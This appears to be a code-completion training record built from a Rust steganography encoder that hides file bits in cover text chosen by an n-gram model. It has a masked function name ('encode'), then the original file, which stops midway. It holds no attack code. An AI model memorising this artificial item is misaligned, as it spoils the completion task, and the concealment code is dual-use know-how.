/// (a `Vec` of words) to its occurrence count and holds grams for every
/// depth in `1..=n`, `unique_words` lists the distinct words in first-seen
/// order, and `total_words` is the number of whitespace-separated tokens.
pub fn generate_ngrams<'a>(text: &'a String, n: usize) -> (HashMap<Vec<&str>, usize>, Vec<&str>, usize) {
    let mut n_down = n;
    let mut hash: HashMap<Vec<&str>, usize> = HashMap::new();
    let mut unique_words: Vec<&str> = vec![];
    let mut total_words = 0;
    while n_down > 0 {
        // we wish to generate a hash map that contains n-grams for each value of n
        // from the user provided n, down to n == 1. this allows us to do a 'stupid backoff'
        // if there is not enough data at a certain n-depth for a certain word, we can
        // keep backing off to n - 1 until we find enough data to make a decision on which
        // word to use. (or until we hit n == 1, in which case we pick a random word).
        let mut grams: Vec<Vec<&str>> = vec![];
        match n_down {
            1 => {
                for t in text.split_whitespace() {
                    grams.push(vec![t]);
                }
                // for some reason the ngrams crate has difficulty when n == 1,
                // so in this case we generate the n gram ourselves by a simple whitespace
                // delimiter.
            },
            _ => {
                grams = text.split_whitespace().ngrams(n_down).collect();
            }
        }
        for v in grams {
            if n_down == 1 {
                // depth 1 visits every token exactly once, so total the words here
                total_words += 1;
            }
            if let Some(val) = hash.get_mut(&v) {
                *val += 1;
            } else {
                if n_down == 1 {
                    unique_words.push(v[0]);
                    // if we are on the last n-depth (n == 1),
                    // that means the vectors only contain one word.
                    // if the hash does not have this vector of one word yet, then
                    // this is the first time we are seeing it, so we will add it to
                    // a vector of unique words.
                }
                hash.insert(v, 1);
                // if the hash does not have this vector yet, add it
                // with occurance 1, and next time we see this vector,
                // increment the occurance
            }
        }
        n_down -= 1;
    }
    (hash, unique_words, total_words)
}
/// Returns every character of the bit map that does NOT occur in `gib_word`.
/// A cover word containing any of these characters would encode extra bits,
/// so candidates must avoid them. (Result order is unspecified, as the
/// characters come from a `HashMap`.)
pub fn get_restricted_chars(char_map: &HashMap<char, usize>, gib_word: &String) -> Vec<char> {
    char_map
        .keys()
        .copied()
        .filter(|c| !gib_word.contains(*c))
        .collect()
}
/// Decides whether `word` can hide a gibberish string: it must contain every
/// character in `good_chars` at least once and no character from
/// `restricted_chars` at all.
pub fn can_use_word(word: &str, good_chars: &Vec<char>, restricted_chars: &Vec<char>) -> bool {
    // Track how many times each good char is seen, by position in good_chars.
    let mut coverage = vec![0usize; good_chars.len()];
    for ch in word.chars() {
        // Any restricted character disqualifies the word immediately.
        if restricted_chars.contains(&ch) {
            return false;
        }
        if let Some(idx) = good_chars.iter().position(|&g| g == ch) {
            coverage[idx] += 1;
        }
    }
    // Every good character must have been covered at least once.
    coverage.into_iter().all(|count| count > 0)
}
/// Of all n-grams of exactly length `n`, finds the most frequent
/// (n-1)-word prefix and returns it; this seeds the generator with a
/// plausible opening context. Ties are broken arbitrarily (HashMap order),
/// matching the original behavior.
pub fn get_initial_words<'a>(hashmap: &'a HashMap<Vec<&str>, usize>, n: usize) -> Vec<&'a str> {
    // Count how often each (n-1)-word prefix appears among the length-n keys.
    let mut prefix_counts: HashMap<Vec<&'a str>, usize> = HashMap::new();
    for key in hashmap.keys().filter(|k| k.len() == n) {
        let prefix: Vec<&'a str> = key.iter().take(n.saturating_sub(1)).copied().collect();
        *prefix_counts.entry(prefix).or_insert(0) += 1;
    }
    // Pick the prefix with the strictly highest count.
    let mut best_count = 0;
    let mut best_prefix: Vec<&'a str> = vec![];
    for (prefix, &count) in &prefix_counts {
        if count > best_count {
            best_count = count;
            best_prefix = prefix.clone();
        }
    }
    best_prefix
}
/// Estimates P(word | given) from raw n-gram counts: the count of the
/// sequence `given + word` divided by the count of `given`. An empty
/// `given` uses `num_words` (the corpus size) as the denominator.
/// Returns 0.0 whenever either count is absent from the map.
pub fn get_probability_of(word: &str, given: &Vec<&str>, hashmap: &HashMap<Vec<&str>, usize>, num_words: f64) -> f64 {
    let denominator = if given.is_empty() {
        num_words
    } else {
        match hashmap.get(given) {
            Some(&count) => count as f64,
            None => return 0.0,
        }
    };
    // Look up the full sequence: context followed by the candidate word.
    let mut sequence = given.clone();
    sequence.push(word);
    hashmap
        .get(&sequence)
        .map_or(0.0, |&count| count as f64 / denominator)
}
/// Ranks `usable_words` by P(word | last `use_n - 1` context words) using
/// "stupid backoff": if every candidate scores zero at the current depth,
/// the context is shortened by one and the ranking retried. Returns the
/// chosen word and the depth index actually used; depth 0 means the word
/// was chosen at random because no n-gram evidence was found.
///
/// NOTE(review): `ngram_slice.last().unwrap()` panics when the slice is
/// empty, which happens if this is entered with `use_n == 1` (i.e. the
/// function is called with `n == 1`). Callers in this file appear to pass
/// the CLI `n_depth`; confirm `n >= 2` is enforced upstream.
pub fn get_best_word<'a>(
    gram: &HashMap<Vec<&str>, usize>,
    usable_words: &Vec<&'a str>,
    current_words: &Vec<&str>,
    n: usize,
    total_words: f64,
) -> (&'a str, usize) {
    let mut all_p_zero = true;
    let mut use_n = n;
    let mut max_p_index = 0;
    while all_p_zero {
        // Build the context: the last (use_n - 1) words, in order.
        let mut ngram_slice = vec![];
        let mut counter = 1;
        for word in current_words.iter().rev() {
            if counter < use_n {
                ngram_slice.push(*word);
            }
            counter += 1;
        }
        ngram_slice.reverse();
        let last_word = ngram_slice.last().unwrap();
        let mut max_p = 0.0;
        max_p_index = 0;
        for i in 0..usable_words.len() {
            let w = &usable_words[i];
            // avoid emitting the same word twice in a row
            if w == last_word {
                continue;
            }
            let p = get_probability_of(w, &ngram_slice, gram, total_words);
            // let p = get_interpolated_probability(w, &ngram_slice, gram, total_words);
            // println!("P({} | {:?}) = {}", w, ngram_slice, p);
            if p > max_p {
                all_p_zero = false;
                max_p_index = i;
                max_p = p;
            }
        }
        if all_p_zero {
            use_n -= 1;
        }
        // comment this if using interpolation
        if use_n == 1 {
            // no point in picking the word that appears the most...
            // take our chances and break, and pick a random word from the list.
            // println!("reached bottom of use n!");
            break;
        }
    }
    // Shift to a 0-based depth index; 0 triggers the random fallback below.
    use_n -= 1;
    if use_n == 0 {
        let mut rng = rand::thread_rng();
        max_p_index = rng.gen_range(0, usable_words.len());
    }
    (usable_words[max_p_index], use_n)
}
/// Hides the gibberish strings in `file_words` inside natural-looking text.
///
/// For each gibberish word, every dictionary word that contains all of its
/// characters and none of the other bit-map characters is a candidate; the
/// n-gram model then picks the most probable candidate. "Skip" words (words
/// that encode no bits) may be interleaved to improve fluency, bounded by
/// `consecutive_skips` and `depth_skip_threshold`. Returns the stego text
/// and prints an encoding summary to stdout.
pub fn wordify(
    gram: &HashMap<Vec<&str>, usize>,
    n: usize,
    file_words: Vec<String>,
    rng: &mut StdRng,
    bit_to_char_map: &mut HashMap<usize, char>,
    unique_words: &Vec<&str>,
    total_words: f64,
    consecutive_skips: usize,
    depth_skip_threshold: usize,
    use_shuffle: bool,
) -> Result<String, String> {
    // Invert the bit->char map for char lookups.
    let mut char_to_bit_map = HashMap::new();
    for (&bit_val, &ch) in bit_to_char_map.iter() {
        char_to_bit_map.insert(ch, bit_val);
    }
    // The map holds one entry per bit plus the zero entry, hence the -1.
    let num_bits = bit_to_char_map.len() - 1;
    let mut succ_count = 0;
    let mut fail_count = 0;
    let mut skip_count = 0;
    let mut n_gram_used = vec![0; n];
    let mut text_data = String::from("");
    let mut current_words = get_initial_words(gram, n);
    let mut i = 0;
    let mut consecutive_skips_used = 0;
    let mut skip_words = vec![];
    if !use_shuffle {
        // Without shuffling the bit map never changes, so the skip words
        // can be computed once up front.
        for w in unique_words {
            if utils::is_skip_word(w, &char_to_bit_map) {
                skip_words.push(*w);
            }
        }
    }
    while i < file_words.len() {
        let gibberish_word = &file_words[i];
        let mut used_skip_word = false;
        let restricted_chars = get_restricted_chars(&char_to_bit_map, gibberish_word);
        let mut usable_words = vec![];
        if use_shuffle {
            // The bit map may have changed since the previous word, so the
            // skip words must be recomputed every iteration.
            skip_words = vec![];
        }
        for w in unique_words {
            if use_shuffle && utils::is_skip_word(w, &char_to_bit_map) {
                skip_words.push(*w);
            }
            if can_use_word(w, &gibberish_word.chars().collect(), &restricted_chars) {
                usable_words.push(*w);
            }
        }
        match usable_words.len() {
            0 => {
                // No word can encode this value: emit the gibberish as-is so
                // decoding still works, and nudge the n-gram state with ".".
                fail_count += 1;
                text_data.push_str(gibberish_word);
                text_data.push_str(" ");
                current_words.push(".");
                consecutive_skips_used = 0;
            },
            1 => {
                // Exactly one candidate: use it without ranking (depth 0).
                succ_count += 1;
                let best_word = &usable_words[0];
                text_data.push_str(best_word);
                current_words.push(best_word);
                text_data.push_str(" ");
                n_gram_used[0] += 1;
                consecutive_skips_used = 0;
            },
            _ => {
                let (best_word, n_used) = get_best_word(
                    gram,
                    &usable_words,
                    &current_words,
                    n,
                    total_words,
                );
                // The user fine-tunes output quality with depth_skip_threshold
                // and consecutive_skips: higher values insert more skip words,
                // which can look more like real text at the cost of encoding
                // fewer bits per word. consecutive_skips_used bounds the skip
                // run so a word is eventually encoded and the loop terminates.
                if n_used <= depth_skip_threshold
                    && consecutive_skips_used < consecutive_skips
                    && skip_words.len() > 0
                {
                    let (best_word2, n_used2) = get_best_word(
                        gram,
                        &skip_words,
                        &current_words,
                        n,
                        total_words,
                    );
                    n_gram_used[n_used2] += 1;
                    current_words.push(best_word2);
                    text_data.push_str(best_word2);
                    text_data.push_str(" ");
                    skip_count += 1;
                    used_skip_word = true;
                    consecutive_skips_used += 1;
                    // `i` is deliberately not advanced below, so this
                    // gibberish word is retried. (The previous version did
                    // `i -= 1` here and `i += 1` later, which underflowed
                    // usize when a skip word fired at i == 0.)
                } else {
                    succ_count += 1;
                    n_gram_used[n_used] += 1;
                    text_data.push_str(best_word);
                    current_words.push(best_word);
                    text_data.push_str(" ");
                    consecutive_skips_used = 0;
                }
            }
        };
        if !used_skip_word {
            if use_shuffle {
                // Only shuffle after actually encoding a word; shuffling
                // after a skip word would desynchronize the decoder.
                utils::fill_bit_to_char_map(rng, bit_to_char_map);
                char_to_bit_map = utils::make_char_to_bit_map(bit_to_char_map);
            }
            i += 1;
        }
    }
    text_data.pop(); // remove trailing space
    let num_bytes = (file_words.len() * num_bits) / 8;
    // print summary
    println!("\nencoding using {} bits per word. file had {} bytes, ie: {} words to wordify", num_bits, num_bytes, file_words.len());
    println!("succesfully filled {} words", (succ_count + skip_count));
    println!("of the {} words, {} were skip words", (succ_count + skip_count), skip_count);
    println!("failed to find a word {} times", fail_count);
    println!("average bits per word: {}\n", ((num_bytes * 8) as f64 / (succ_count + skip_count) as f64));
    println!("\nN-depth summary: {:?}", n_gram_used);
    Ok(text_data)
}
/// Splits `file_contents` into `num_bits`-sized values for char->value mode.
///
/// Reads the input `num_bits` at a time (the final read may be shorter) and
/// returns the raw values. When `use_shuffle` is set, the char->value map is
/// advanced once per value so encoding stays in lock-step with the decoder's
/// identically-seeded rng.
pub fn get_value_vec_from_char_value_mode(
    file_contents: &Vec<u8>,
    num_bits: usize,
    use_shuffle: bool,
    rng: &mut StdRng,
    char_to_value_map: &mut HashMap<char, usize>,
) -> Vec<u8> {
    let mut cursor = Cursor::new(&file_contents);
    let mut num_bits_remain = file_contents.len() * 8;
    let mut bitreader = BitReader::endian(&mut cursor, BigEndian);
    let mut value_vec = vec![];
    while num_bits_remain > 0 {
        // read a full chunk, or whatever bits are left at the tail
        let num_bits_to_read = if num_bits_remain < num_bits as usize {
            num_bits_remain as u32
        } else {
            num_bits as u32
        };
        let value: u8 = bitreader.read(num_bits_to_read).unwrap();
        if use_shuffle {
            utils::shuffle_char_value_map(rng, char_to_value_map);
        }
        value_vec.push(value);
        num_bits_remain -= num_bits_to_read as usize;
    }
    value_vec
}
/// Converts `file_contents` into gibberish character strings for the
/// char-bit-map mode: the file is read `num_bits` at a time and each value
/// is mapped to the characters whose bits are set, via `bit_to_char_map`.
/// With `use_shuffle`, the map is re-filled from the seeded rng after every
/// value so the decoder can replay the same sequence.
pub fn get_value_vec(
    bit_to_char_map: &mut HashMap<usize, char>,
    file_contents: &Vec<u8>,
    num_bits: usize,
    use_shuffle: bool,
    rng: &mut StdRng,
) -> Vec<String> {
    let mut cursor = Cursor::new(&file_contents);
    let mut num_bits_remain = file_contents.len() * 8;
    let mut bitreader = BitReader::endian(&mut cursor, BigEndian);
    let mut sorted_keys = vec![];
    let mut value_vec = vec![];
    for byte_val in bit_to_char_map.keys() {
        sorted_keys.push(*byte_val);
    }
    sorted_keys.sort_by(|a, b| b.cmp(a));
    // sort keys once so you dont need to do it in the iteration.
    // the bit to char map maps bit positions: (0, 1, 2, 4, 8, 16, 32, etc)
    // to characters. we iterate over the bit position values, and push the value
    // to a sorted_keys vec, and then sort in descending order
    // (ie: 0th element is largest)
    // we do this because the user provides the number of bits.
    // so if the user says number
    // of bits is 3, then the sorted keys will look like: [4, 2, 1, 0]
    while num_bits_remain > 0 {
        // read a full chunk, or whatever bits are left at the tail
        let num_bits_to_read = if num_bits_remain < num_bits as usize {
            num_bits_remain as u32
        } else {
            num_bits as u32
        };
        let value: u8 = bitreader.read(num_bits_to_read).unwrap();
        let char_str = utils::get_chars_from_value(value, bit_to_char_map, &sorted_keys);
        if use_shuffle {
            utils::fill_bit_to_char_map(rng, bit_to_char_map);
        }
        value_vec.push(char_str);
        num_bits_remain -= num_bits_to_read as usize;
    }
    // iterate the file that you wish to encode, reading num_bits at a time.
    // for each value you read, generate characters that map to the value using the bit to char map
    // if using shuffle, the bit to char map gets shuffled according to a seeded rng.
    // at the end you have a vector of gibberish strings that you will try to hide
    // in words using ngrams.
    value_vec
}
/// Hides each value of `file_values` by emitting a dictionary word whose
/// character value (per `char_to_value_map`, interpreted by `value_mode`)
/// equals that value; ties between candidates are broken with the n-gram
/// model. Returns the stego text and prints a summary to stdout.
///
/// Punctuation tokens are never emitted: the decoder does not ignore them,
/// and keeping them would force unnatural spacing ("cars , toys , ...").
///
/// # Panics
/// Panics if no dictionary word maps to a required value.
pub fn wordify_from_char_value_mode(
    gram: &HashMap<Vec<&str>, usize>,
    char_to_value_map: &mut HashMap<char, usize>,
    n: usize,
    file_values: Vec<u8>,
    num_bits: usize,
    unique_words: &Vec<&str>,
    total_words: f64,
    use_shuffle: bool,
    value_mode: utils::ValueMode,
    rng: &mut StdRng,
) -> Result<String, String> {
    let mut succ_count = 0;
    let mut n_gram_used = vec![0; n];
    let mut text_data = String::from("");
    let mut current_words = get_initial_words(gram, n);
    let mut i = 0;
    while i < file_values.len() {
        let current_val = file_values[i];
        // Collect every non-punctuation word whose value matches current_val.
        let mut usable_words = vec![];
        for w in unique_words {
            if *w == "." || *w == "," || *w == "?" || *w == ";" || *w == "!" {
                continue;
            }
            let w_val = utils::get_value_from_chars(w, &char_to_value_map, &value_mode);
            if w_val == current_val as usize {
                usable_words.push(*w);
            }
        }
        match usable_words.len() {
            0 => {
                panic!("NOT ENOUGH WORDS WITH VALUE {}", current_val);
            },
            1 => {
                // Single candidate: take it without ranking (depth 0).
                succ_count += 1;
                let best_word = &usable_words[0];
                text_data.push_str(best_word);
                current_words.push(best_word);
                text_data.push_str(" ");
                n_gram_used[0] += 1;
            },
            _ => {
                // Several candidates: pick the most probable continuation.
                // (Previous version had mojibake `¤t_words` here;
                // restored to `&current_words`.)
                let (best_word, n_used) = get_best_word(
                    gram,
                    &usable_words,
                    &current_words,
                    n,
                    total_words,
                );
                succ_count += 1;
                n_gram_used[n_used] += 1;
                text_data.push_str(best_word);
                current_words.push(best_word);
                text_data.push_str(" ");
            }
        };
        if use_shuffle {
            // Keep the map in lock-step with the decoder's seeded rng.
            utils::shuffle_char_value_map(rng, char_to_value_map);
        }
        i += 1;
    }
    text_data.pop(); // remove trailing space
    let num_bytes = (file_values.len() * num_bits) / 8;
    // print summary
    println!("\nencoding using {} bits per word. file had {} bytes, ie: {} words to wordify", num_bits, num_bytes, file_values.len());
    println!("succesfully filled {} words", succ_count);
    println!("average bits per word: {}\n", ((num_bytes * 8) as f64 / succ_count as f64));
    println!("\nN-depth summary: {:?}", n_gram_used);
    Ok(text_data)
}
/// CLI driver for the char-bit-map encoding mode: reads `file`, converts its
/// bits into gibberish character strings via the bit->char map, hides them
/// in words drawn from `word_file_name`, and writes the result to `output`.
///
/// Two identically-seeded rng/map pairs are created because `get_value_vec`
/// advances its copy while reading values; `wordify` must start from the
/// pristine copy so an identically-seeded decoder stays in sync.
pub fn encode_char_bit_map(
    file: &str,
    output: &str,
    seed_str: &str,
    word_file_name: &str,
    n_depth: usize,
    consecutive_skips: usize,
    depth_skip_threshold: usize,
    num_bits: usize,
    use_shuffle: bool,
) -> Result<(), String> {
    let mut rng = utils::create_rng_from_seed(seed_str);
    let mut original_rng = utils::create_rng_from_seed(seed_str);
    let contents = utils::get_file_contents(file)?;
    let mut word_file_data = utils::get_file_contents_as_string(word_file_name)?;
    let mut bit_to_char_map = utils::make_bit_to_char_map(num_bits);
    let mut original_bit_to_char_map = bit_to_char_map.clone();
    utils::fill_bit_to_char_map(&mut rng, &mut bit_to_char_map);
    utils::fill_bit_to_char_map(&mut original_rng, &mut original_bit_to_char_map);
    let value_vec = get_value_vec(&mut bit_to_char_map, &contents, num_bits, use_shuffle, &mut rng);
    // normalize the corpus before building the n-gram model
    word_file_data = word_file_data.to_lowercase();
    word_file_data = utils::format_text_for_ngrams(&word_file_data);
    let (
        gram_hash,
        unique_words,
        total_words,
    ) = generate_ngrams(&word_file_data, n_depth);
    let text_data = wordify(
        &gram_hash,
        n_depth,
        value_vec,
        &mut original_rng,
        &mut original_bit_to_char_map,
        &unique_words,
        total_words as f64,
        consecutive_skips,
        depth_skip_threshold,
        use_shuffle,
    )?;
    // propagate the I/O error instead of panicking (previously unwrap)
    fs::write(output, text_data).map_err(|e| e.to_string())?;
    Ok(())
}
/// CLI driver for the char->value encoding mode: reads `file`, maps its bits
/// to values, hides those values in words drawn from `word_file_name` via
/// the n-gram model, and writes the stego text to `output`.
/// (`consecutive_skips` / `depth_skip_threshold` are accepted for interface
/// parity with the bit-map mode but are unused here.)
///
/// Two identically-seeded rng/map pairs are created because
/// `get_value_vec_from_char_value_mode` advances its copy while reading
/// values; `wordify_from_char_value_mode` must start from the pristine copy
/// so an identically-seeded decoder stays in sync.
pub fn encode_char_value_map(
    file: &str,
    output: &str,
    seed_str: &str,
    word_file_name: &str,
    n_depth: usize,
    consecutive_skips: usize,
    depth_skip_threshold: usize,
    num_bits: usize,
    use_shuffle: bool,
    value_mode: utils::ValueMode,
) -> Result<(), String> {
    let mut rng = utils::create_rng_from_seed(seed_str);
    let mut original_rng = utils::create_rng_from_seed(seed_str);
    let contents = utils::get_file_contents(file)?;
    let mut word_file_data = utils::get_file_contents_as_string(word_file_name)?;
    let mut char_to_value_map = utils::make_char_to_value_map(num_bits);
    let mut original_char_to_value_map = char_to_value_map.clone();
    utils::shuffle_char_value_map(&mut rng, &mut char_to_value_map);
    utils::shuffle_char_value_map(&mut original_rng, &mut original_char_to_value_map);
    // not mutated after creation, so no `mut` binding
    let value_vec = get_value_vec_from_char_value_mode(
        &contents,
        num_bits,
        use_shuffle,
        &mut rng,
        &mut char_to_value_map,
    );
    // normalize the corpus before building the n-gram model
    word_file_data = word_file_data.to_lowercase();
    word_file_data = utils::format_text_for_ngrams(&word_file_data);
    let (
        gram_hash,
        unique_words,
        total_words,
    ) = generate_ngrams(&word_file_data, n_depth);
    let text_data = wordify_from_char_value_mode(
        &gram_hash,
        &mut original_char_to_value_map,
        n_depth,
        value_vec,
        num_bits,
        &unique_words,
        total_words as f64,
        use_shuffle,
        value_mode,
        &mut original_rng,
    )?;
    // propagate the I/O error instead of panicking (previously unwrap)
    fs::write(output, text_data).map_err(|e| e.to_string())?;
    Ok(())
}
pub fn | (matches: &ArgMatches) -> Result<(), String> {
let file = utils::get_value(matches, "file")?;
let output = utils::get_value(matches, "output")?;
let mut seed_str = utils::get_value(matches, "seed")?;
let password_str = utils::get_value(matches, "password")?;
let alg_str = utils::get_value(matches, "algorithm")?;
let word_file_name = utils::get_value(matches, "words")?;
let n_depth = utils::get_numerical_value(matches, "n")?;
let consecutive_skips = utils::get_numerical_value(matches, "consecutive_skips")?;
let depth_skip_threshold = utils::get_numerical_value(matches, "depth_skip")?;
let num_bits = utils::get_numerical_value(matches, "bits")?;
if num_bits > 8 || num_bits < 1 {
return Err(format!("Bits must be between 1 and 8 inclusively, you provided {}", num_bits));
}
let pass;
match password_str {
"true" => {
// get seed string interactively
pass = rpassword::prompt_password_stderr("Enter password: ").unwrap();
seed_str = pass.as_str();
},
_ => (),
};
let alg = utils::get_algorithm_from_string(alg_str, num_bits)?;
let (use_shuffle, value_mode) = match alg {
utils::Algorithm::Shuffle(mode) => {
(true, mode)
},
utils::Algorithm::NoShuffle(mode) => {
(false, mode)
},
};
match value_mode {
utils::ValueMode::CharBitMap => {
encode_char_bit_map(
file,
output,
seed_str,
word_file_name,
n_depth,
consecutive_skips,
depth_skip_threshold,
num_bits,
use_shuffle,
)
},
utils::ValueMode::CharValueMap(val) => {
encode_char_value_map(
file,
output,
seed_str,
word_file_name,
n_depth,
consecutive_skips,
depth_skip_threshold,
num_bits,
use_shuffle,
value_mode,
)
},
}
} | encode | identifier_name |
encode.rs | use std::fs;
use std::io::{Cursor};
use std::collections::HashMap;
use clap::ArgMatches;
use rand::{Rng, prelude::StdRng};
use bitstream_io::{BigEndian, BitReader};
use ngrams::Ngram;
use rpassword;
use super::utils;
pub fn generate_ngrams<'a>(text: &'a String, n: usize) -> (HashMap<Vec<&str>, usize>, Vec<&str>, usize) {
let mut n_down = n;
let mut hash: HashMap<Vec<&str>, usize> = HashMap::new();
let mut unique_words: Vec<&str> = vec![];
let mut total_words = 0;
while n_down > 0 {
// we wish to generate a hash map that contains n-grams for each value of n
// from the user provided n, down to n == 1. this allows us to do a 'stupid backoff'
// if there is not enough data at a certain n-depth for a certain word, we can
// keep backing off to n - 1 until we find enough data to make a decision on which
// word to use. (or until we hit n == 1, in which case we pick a random word).
let mut grams: Vec<Vec<&str>> = vec![];
match n_down {
1 => {
for t in text.split_whitespace() {
grams.push(vec![t]);
}
// for some reason the ngrams crate has difficulty when n == 1,
// so in this case we generate the n gram ourselves by a simple whitespace
// delimiter.
},
_ => {
grams = text.split_whitespace().ngrams(n_down).collect();
}
}
for v in grams {
if n_down == 1 {
total_words += 1;
}
if let Some(val) = hash.get_mut(&v) {
*val += 1;
} else {
if n_down == 1 {
unique_words.push(v[0]);
// if we are on the last n-depth (n == 1),
// that means the vectors only contain one word.
// if the hash does not have this vector of one word yet, then
// this is the first time we are seeing it, so we will add it to
// a vector of unique words.
}
hash.insert(v, 1);
// if the hash does not have this vector yet, add it
// with occurance 1, and next time we see this vector,
// increment the occurance
}
}
n_down -= 1;
}
(hash, unique_words, total_words)
}
pub fn get_restricted_chars(char_map: &HashMap<char, usize>, gib_word: &String) -> Vec<char> {
let mut restricted_chars = vec![];
for key in char_map.keys() {
restricted_chars.push(*key);
}
let word_chars: Vec<char> = gib_word.chars().collect();
for c in word_chars {
if restricted_chars.contains(&c) {
let char_index = restricted_chars.iter().position(|&r| r == c).unwrap();
restricted_chars.remove(char_index);
}
}
restricted_chars
}
pub fn can_use_word(word: &str, good_chars: &Vec<char>, restricted_chars: &Vec<char>) -> bool {
let word_chars: Vec<char> = word.chars().collect();
let mut good_chars_used = vec![0; good_chars.len()];
for c in word_chars {
if restricted_chars.contains(&c) {
return false;
}
if good_chars.contains(&c) {
let char_index = good_chars.iter().position(|&r| r == c).unwrap();
good_chars_used[char_index] += 1;
}
}
for i in good_chars_used {
if i == 0 {
return false;
}
}
true
}
pub fn get_initial_words<'a>(hashmap: &'a HashMap<Vec<&str>, usize>, n: usize) -> Vec<&'a str> {
let mut vecs_with_n_items = vec![];
for key in hashmap.keys() {
if key.len() == n {
vecs_with_n_items.push(key);
}
}
let mut count_hash = HashMap::new();
for vec in vecs_with_n_items {
let mut n_minus_1_slice = vec![];
let mut counter = 1;
for word in vec {
if counter < n {
n_minus_1_slice.push(*word);
} else {
break;
}
counter += 1;
}
if let Some(val) = count_hash.get_mut(&n_minus_1_slice) {
*val += 1;
} else {
count_hash.insert(n_minus_1_slice, 1);
}
}
let mut best_vec_count = 0;
let mut best_vec = vec![];
for vec in count_hash.keys() {
let vec_count = count_hash.get(vec).unwrap();
if vec_count > &best_vec_count {
best_vec_count = *vec_count;
best_vec = vec.to_vec();
}
}
best_vec
}
pub fn get_probability_of(word: &str, given: &Vec<&str>, hashmap: &HashMap<Vec<&str>, usize>, num_words: f64) -> f64 {
let count_of_given = match given.len() {
0 => num_words,
_ => {
if let Some(count) = hashmap.get(given) {
*count as f64
} else {
return 0.0;
}
},
};
let mut word_vec = given.clone();
word_vec.push(word);
let count_of_sequence = if let Some(count) = hashmap.get(&word_vec) {
*count as f64
} else {
return 0.0;
};
count_of_sequence / count_of_given
}
pub fn get_best_word<'a>(
gram: &HashMap<Vec<&str>, usize>,
usable_words: &Vec<&'a str>,
current_words: &Vec<&str>,
n: usize,
total_words: f64,
) -> (&'a str, usize) {
let mut all_p_zero = true;
let mut use_n = n;
let mut max_p_index = 0;
while all_p_zero {
let mut ngram_slice = vec![];
let mut counter = 1;
for word in current_words.iter().rev() {
if counter < use_n {
ngram_slice.push(*word);
}
counter += 1;
}
ngram_slice.reverse();
let last_word = ngram_slice.last().unwrap();
let mut max_p = 0.0;
max_p_index = 0;
for i in 0..usable_words.len() {
let w = &usable_words[i];
if w == last_word {
continue;
}
let p = get_probability_of(w, &ngram_slice, gram, total_words);
// let p = get_interpolated_probability(w, &ngram_slice, gram, total_words);
// println!("P({} | {:?}) = {}", w, ngram_slice, p);
if p > max_p {
all_p_zero = false;
max_p_index = i;
max_p = p;
}
}
if all_p_zero {
use_n -= 1;
}
// comment this if using interpolation
if use_n == 1 {
// no point in picking the word that appears the most...
// take our chances and break, and pick a random word from the list.
// println!("reached bottom of use n!");
break;
}
}
use_n -= 1;
if use_n == 0 {
let mut rng = rand::thread_rng();
max_p_index = rng.gen_range(0, usable_words.len());
}
(usable_words[max_p_index], use_n)
}
/// Hides the gibberish strings in `file_words` inside natural-looking text.
///
/// For each gibberish word, every dictionary word that contains all of its
/// characters and none of the other bit-map characters is a candidate; the
/// n-gram model then picks the most probable candidate. "Skip" words (words
/// that encode no bits) may be interleaved to improve fluency, bounded by
/// `consecutive_skips` and `depth_skip_threshold`. Returns the stego text
/// and prints an encoding summary to stdout.
pub fn wordify(
    gram: &HashMap<Vec<&str>, usize>,
    n: usize,
    file_words: Vec<String>,
    rng: &mut StdRng,
    bit_to_char_map: &mut HashMap<usize, char>,
    unique_words: &Vec<&str>,
    total_words: f64,
    consecutive_skips: usize,
    depth_skip_threshold: usize,
    use_shuffle: bool,
) -> Result<String, String> {
    // Invert the bit->char map for char lookups.
    let mut char_to_bit_map = HashMap::new();
    for (&bit_val, &ch) in bit_to_char_map.iter() {
        char_to_bit_map.insert(ch, bit_val);
    }
    // The map holds one entry per bit plus the zero entry, hence the -1.
    let num_bits = bit_to_char_map.len() - 1;
    let mut succ_count = 0;
    let mut fail_count = 0;
    let mut skip_count = 0;
    let mut n_gram_used = vec![0; n];
    let mut text_data = String::from("");
    let mut current_words = get_initial_words(gram, n);
    let mut i = 0;
    let mut consecutive_skips_used = 0;
    let mut skip_words = vec![];
    if !use_shuffle {
        // Without shuffling the bit map never changes, so the skip words
        // can be computed once up front.
        for w in unique_words {
            if utils::is_skip_word(w, &char_to_bit_map) {
                skip_words.push(*w);
            }
        }
    }
    while i < file_words.len() {
        let gibberish_word = &file_words[i];
        let mut used_skip_word = false;
        let restricted_chars = get_restricted_chars(&char_to_bit_map, gibberish_word);
        let mut usable_words = vec![];
        if use_shuffle {
            // The bit map may have changed since the previous word, so the
            // skip words must be recomputed every iteration.
            skip_words = vec![];
        }
        for w in unique_words {
            if use_shuffle && utils::is_skip_word(w, &char_to_bit_map) {
                skip_words.push(*w);
            }
            if can_use_word(w, &gibberish_word.chars().collect(), &restricted_chars) {
                usable_words.push(*w);
            }
        }
        match usable_words.len() {
            0 => {
                // No word can encode this value: emit the gibberish as-is so
                // decoding still works, and nudge the n-gram state with ".".
                fail_count += 1;
                text_data.push_str(gibberish_word);
                text_data.push_str(" ");
                current_words.push(".");
                consecutive_skips_used = 0;
            },
            1 => {
                // Exactly one candidate: use it without ranking (depth 0).
                succ_count += 1;
                let best_word = &usable_words[0];
                text_data.push_str(best_word);
                current_words.push(best_word);
                text_data.push_str(" ");
                n_gram_used[0] += 1;
                consecutive_skips_used = 0;
            },
            _ => {
                let (best_word, n_used) = get_best_word(
                    gram,
                    &usable_words,
                    &current_words,
                    n,
                    total_words,
                );
                // The user fine-tunes output quality with depth_skip_threshold
                // and consecutive_skips: higher values insert more skip words,
                // which can look more like real text at the cost of encoding
                // fewer bits per word. consecutive_skips_used bounds the skip
                // run so a word is eventually encoded and the loop terminates.
                if n_used <= depth_skip_threshold
                    && consecutive_skips_used < consecutive_skips
                    && skip_words.len() > 0
                {
                    let (best_word2, n_used2) = get_best_word(
                        gram,
                        &skip_words,
                        &current_words,
                        n,
                        total_words,
                    );
                    n_gram_used[n_used2] += 1;
                    current_words.push(best_word2);
                    text_data.push_str(best_word2);
                    text_data.push_str(" ");
                    skip_count += 1;
                    used_skip_word = true;
                    consecutive_skips_used += 1;
                    // `i` is deliberately not advanced below, so this
                    // gibberish word is retried. (The previous version did
                    // `i -= 1` here and `i += 1` later, which underflowed
                    // usize when a skip word fired at i == 0.)
                } else {
                    succ_count += 1;
                    n_gram_used[n_used] += 1;
                    text_data.push_str(best_word);
                    current_words.push(best_word);
                    text_data.push_str(" ");
                    consecutive_skips_used = 0;
                }
            }
        };
        if !used_skip_word {
            if use_shuffle {
                // Only shuffle after actually encoding a word; shuffling
                // after a skip word would desynchronize the decoder.
